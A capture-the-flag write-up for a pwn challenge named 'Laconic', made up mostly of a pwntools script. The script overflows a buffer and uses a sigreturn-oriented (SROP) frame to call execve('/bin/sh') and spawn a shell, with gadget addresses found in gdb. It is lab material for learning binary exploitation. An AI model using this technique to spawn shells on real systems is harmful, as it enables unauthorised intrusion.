pwn - Laconic

pwndbg> search /bin/sh
Searching for byte: b'/bin/sh'
laconic         0x43238 0x68732f6e69622f /* '/bin/sh' */

#!/usr/bin/env python3

from pwn import *

exe = ELF("laconic_patched")

context.terminal = ["tilix", "-a", "session-add-right", "-e"]
context.binary = exe

sla = lambda p, d, x: p.sendlineafter(d, x)
sa = lambda p, d, x: p.sendafter(d, x)
sl = lambda p, x: p.sendline(x)
s = lambda p, x: p.send(x)

slan = lambda p, d, n: p.sendlineafter(d, str(n).encode())
san = lambda p, d, n: p.sendafter(d, str(n).encode())
sln = lambda p, n: p.sendline(str(n).encode())
sn = lambda p, n: p.send(str(n).encode())

ru = lambda p, x: p.recvuntil(x)
rl = lambda p: p.recvline()
rc = lambda p, n: p.recv(n)
rr = lambda p, t: p.recvrepeat(timeout=t)
ra = lambda p, t: p.recvall(timeout=t)
ia = lambda p: p.interactive()

gdbscript = '''
start
b *0x0000000000043015
b *0x43017
set follow-fork-mode parent
set detach-on-fork on
continue
'''

def conn():
    if args.LOCAL:
        p = process([exe.path])
        if args.GDB:
            gdb.attach(p, gdbscript=gdbscript)
        if args.DEBUG:
            context.log_level = 'debug'
        return p
    else:
        host = ""
        port = 0
        return remote(host, port)

p = conn()


frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = 0x43238 # /bin/sh
frame.rsi = 0
frame.rdx = 0
frame.rip = 0x43015 # syscall

payload = b'A' * 8
payload += p64(0x43018) # pop rax
payload += p64(0xf) # rt_sigreturn
payload += p64(0x43015) # syscall
payload += bytes(frame)

sl(p, payload)

ia(p)